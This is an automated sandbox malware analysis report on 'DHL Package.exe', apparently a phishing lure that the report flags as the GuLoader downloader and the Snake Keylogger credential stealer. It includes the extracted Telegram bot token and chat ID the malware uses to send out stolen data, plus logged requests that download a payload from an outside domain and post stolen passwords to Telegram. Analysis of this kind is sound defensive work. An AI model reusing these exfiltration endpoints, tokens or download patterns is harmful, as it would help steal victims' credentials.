Edit tour

Windows Analysis Report
DHL Package.exe

Overview

General Information

Sample name:	DHL Package.exe
Analysis ID:	1489281
MD5:	ceb0fc229f47b61909ce0e6a68dd191f
SHA1:	93862169c62ec357ae869c50e5249fc16bab9cc9
SHA256:	4f3ec860e9371f32df06c6d342b6e16bdc8ad4c08aeeaa8f2a66549750805603
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

DHL Package.exe (PID: 9072 cmdline: "C:\Users\user\Desktop\DHL Package.exe" MD5: CEB0FC229F47B61909CE0E6A68DD191F)

DHL Package.exe (PID: 4252 cmdline: "C:\Users\user\Desktop\DHL Package.exe" MD5: CEB0FC229F47B61909CE0E6A68DD191F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage?chat_id=6873631044"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000C.00000002.6270895609.0000000037035000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.6270895609.000000003710E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2283851326.000000000616D000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: DHL Package.exe PID: 4252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DHL Package.exe PID: 4252	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: DHL Package.exe PID: 4252	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 4 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:23.238618+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Snake Keylogger Telegram Exfil - Source IP: 192.168.11.20 - Destination IP: 149.154.167.220

Timestamp:	2024-08-07T09:28:34.383581+0200
SID:	2853006
Severity:	1
Source Port:	49750
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:18.208911+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:21.129680+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:26.441063+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:22.862325+0200
SID:	2803305
Severity:	3
Source Port:	49745
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:20.067426+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:24.316459+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:21.807309+0200
SID:	2803305
Severity:	3
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:26.060314+0200
SID:	2803305
Severity:	3
Source Port:	49748
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:23.929722+0200
SID:	2803305
Severity:	3
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:24.986734+0200
SID:	2803305
Severity:	3
Source Port:	49747
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:20.751723+0200
SID:	2803305
Severity:	3
Source Port:	49743
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:22.191952+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.93.120.113

Timestamp:	2024-08-07T09:28:15.598712+0200
SID:	2803270
Severity:	2
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.11.20 - Destination IP: 172.67.177.134

Timestamp:	2024-08-07T09:28:27.118767+0200
SID:	2803305
Severity:	3
Source Port:	49749
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.11.20 - Destination IP: 132.226.247.73

Timestamp:	2024-08-07T09:28:25.394377+0200
SID:	2803274
Severity:	2
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000C.00000002.6270895609.0000000036EA1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage?chat_id=6873631044"}
Source: DHL Package.exe.4252.12.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendMessage"}

Multi AV Scanner detection for submitted file

Source: DHL Package.exe

Virustotal: Detection: 15%

Perma Link

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: DHL Package.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49742 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49750 version: TLS 1.2

Source: DHL Package.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00402902 FindFirstFileW,	0_2_00402902
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00406739 FindFirstFileW,FindClose,	0_2_00406739
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AED
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00402902 FindFirstFileW,	12_2_00402902
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00406739 FindFirstFileW,FindClose,	12_2_00406739
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 12_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	12_2_00405AED

Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 0015F00Eh	12_2_0015EE21
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 0015F998h	12_2_0015EE21
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_0015E340
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 0015FDF9h	12_2_0015FB39
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 39381011h	12_2_39380D60
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393815D8h	12_2_393811C0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 39380BB1h	12_2_39380900
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393815D8h	12_2_39381506
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938E3EFh	12_2_3938E148
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938E847h	12_2_3938E5A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938EC9Fh	12_2_3938E9F8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393802F1h	12_2_39380040
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 39380751h	12_2_393804A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938DF97h	12_2_3938DCF0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938F9A7h	12_2_3938F700
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938FDFFh	12_2_3938FB58
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then mov esp, ebp	12_2_3938DA58
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938F0F7h	12_2_3938EE50
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 3938F54Fh	12_2_3938F2A8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393AB043h	12_2_393AAD08
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A8CC7h	12_2_393A8A20
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A7FBFh	12_2_393A7D18
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A32AFh	12_2_393A3008
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A25A7h	12_2_393A2300
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393AA2A7h	12_2_393AA000
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A911Fh	12_2_393A8E78
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A8417h	12_2_393A8170
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A3707h	12_2_393A3460
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A29FFh	12_2_393A2758
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393AA6FFh	12_2_393AA458
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A1CF7h	12_2_393A1A50
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A99F8h	12_2_393A9750
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A0FEFh	12_2_393A0D48
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A02E7h	12_2_393A0040
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_393A5AB8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393AAB57h	12_2_393AA8B0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A2E57h	12_2_393A2BB0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A214Fh	12_2_393A1EA8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A9E4Fh	12_2_393A9BA8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A1447h	12_2_393A11A0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_393A5AA7
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A073Fh	12_2_393A0498
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A7B3Fh	12_2_393A7898
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A189Fh	12_2_393A15F8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A0B97h	12_2_393A08F0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A9577h	12_2_393A92D0
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then jmp 393A886Fh	12_2_393A85C8
Source: C:\Users\user\Desktop\DHL Package.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	12_2_39AC23FA

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcb6910375831aHost: api.telegram.orgContent-Length: 582Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /SjZVauFBbad87.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: monteveliz.clCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49742 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.252.169 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /SjZVauFBbad87.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: monteveliz.clCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",

Source: global traffic	DNS traffic detected: DNS query: monteveliz.cl
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7197950156:AAHyWbH8kpjv0OHg9kyjLK-uVhbdlEhq_ZQ/sendDocument?chat_id=6873631044&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcb6910375831aHost: api.telegram.orgContent-Length: 582Connection: Keep-Alive

Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037142000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000036F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
